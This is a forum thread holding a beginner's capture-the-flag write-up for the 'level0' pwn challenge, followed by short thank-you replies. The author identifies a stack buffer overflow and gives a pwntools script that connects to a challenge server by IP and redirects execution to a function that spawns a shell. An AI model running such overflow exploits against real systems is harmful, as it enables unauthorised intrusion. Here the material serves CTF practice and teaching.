吾愛破解 - LCG - LSG |安卓破解|病毒分析|huihengkj.com

 找回密碼
 注冊[Register]

QQ登錄

只需一步,快速開始

搜索
查看: 3013|回復: 52

[CTF] 攻防世界 level0 wp

  [復制鏈接]
樓主
pushsafe 發表于 2020-11-20 07:48 回帖獎勵
純新手教程 如有錯誤的地方 請各位大佬指出.
利用的主要工具
IDA / olldly / Peil / python pwntools
level0

首先收集一下文件信息
64位程序
Arch: amd64-64-little 程序位數
RELRO:No Relro 開啟無法修改got表
Stack: No canry found 開啟則無法直接覆蓋EIP讓程序任意跳轉,跳轉后會進行cookie校驗;但這項保護可以被繞過
NX開著(開啟則shellcode無法被執行)
Pie: No pie(0x400000) 開啟在每次程序運行地址都會變化,未開啟則返回值括號內是程序的基址
然后將文件放入ida中進行查看

可以看到一個callsystem 和一個 vulnerable_function函數

打開vulnerable_function 按F5 進行反編譯 可以看到 定義buf數組 長度0x80
下面
read
0 文件描述 默認0
&buf 為讀出數據的緩沖區
0x200nll 為每次讀取的字節數(是請求讀取的字節數,讀上來的數據保存在緩沖區buf中,同時文件的當前讀寫位置向后移)
所以限制了 buf的長度為80 但是 在讀取的時候可以讀取200字節的數據 就說明 存在溢出漏洞(覆蓋掉前面80個字節 然后注入payload)

然后看到callsystem 是一個系統調用shell的權限.
可以將地址記錄 然后進行指向.

然后回過頭來看80buf


可以看到 在數組中還存在一個s 占用八個字符 所以覆蓋的長度為 0x80 + 0x8
已知信息:
callsystem 調用 shell 位置 0x00400596
繞過長度 0x80 + 0x8
from pwn import *
👆調用python pwn庫
r = remote(“220.249.52.133”,35488)
👆設置目標信息 remote(“address”,port)
payload = ‘A’*0x80 + ‘a’*0x8+p64(0x00400596)
👆構造payload A * 80 + a * 8 = 88 覆蓋掉原本的數組 + p64(0x00400596)將溢出的地方指向系統調用shell的地址
r.recvuntil(“Hello, World\n”)
👆相當于接收到端口收集的信息 接收到\n,keepends指定保留\n
r.sendline(payload)
👆發送一行數據,相當于在末尾加\n
r.interactive()
👆與獲取的shell進行交互

免費評分

參與人數 15吾愛幣 +10 熱心值 +13 收起 理由
白紙櫻法 + 1 熱心回復!
fengbolee + 1 + 1 用心討論,共獲提升!
zjun777 + 1 + 1 用心討論,共獲提升!
是安可呀 + 1 + 1 我很贊同!
Noslpum + 1 + 1 謝謝@Thanks!
cwj8922 + 1 + 1 用心討論,共獲提升!
戰火恐龍 + 1 用心討論,共獲提升!
wh1sper + 1 + 1 我很贊同!
sdhswddlj + 1 謝謝@Thanks!
指尖花涼亦成傷 + 1 + 1 我很贊同!
哦卡卡 + 1 + 1 用心討論,共獲提升!
Laign + 1 用心討論,共獲提升!
O678O + 1 用心討論,共獲提升!
艾葉生 + 1 用心討論,共獲提升!
lfm333 + 1 用心討論,共獲提升!

查看全部評分

發帖前要善用論壇搜索功能,那里可能會有你要找的答案或者已經有人發布過相同內容了,請勿重復發帖。

推薦
dreamfrog 發表于 2020-11-20 09:50
感謝樓主,這個ida調試我也是總弄不好,樓主的解釋清晰明了,收藏了
推薦
newgod1988 發表于 2020-11-20 22:33
沙發
dmj7798913 發表于 2020-11-20 08:02
3#
mengfang1 發表于 2020-11-20 08:13
支持!!!!!!!!
4#
caolin1861 發表于 2020-11-20 08:22
留個腳印
5#
神奇的阿陽 發表于 2020-11-20 08:36
學習學習,感謝分享
6#
kantao 發表于 2020-11-20 08:37
留個腳印支持!!!!!!!!
7#
lfm333 發表于 2020-11-20 08:38
支持一下,謝謝分享
8#
閃閃閃 發表于 2020-11-20 08:51
學習學習
9#
天舞輪書 發表于 2020-11-20 08:57
學習了,謝謝分享,daydayup
10#
lnzhiling 發表于 2020-11-20 09:07
學習學習,感謝
您需要登錄后才可以回帖 登錄 | 注冊[Register]

本版積分規則 警告:本版塊禁止灌水或回復與主題無關內容,違者重罰!

快速回復 收藏帖子 返回列表 搜索

RSS訂閱|小黑屋|處罰記錄|聯系我們|吾愛破解 - LCG - LSG ( )

GMT+8, 2020-11-27 03:12

Powered by Discuz!

500彩票邀请码Copyright © 2001-2020, Tencent Cloud.

快速回復 返回頂部 返回列表

500彩票邀請碼-彩經網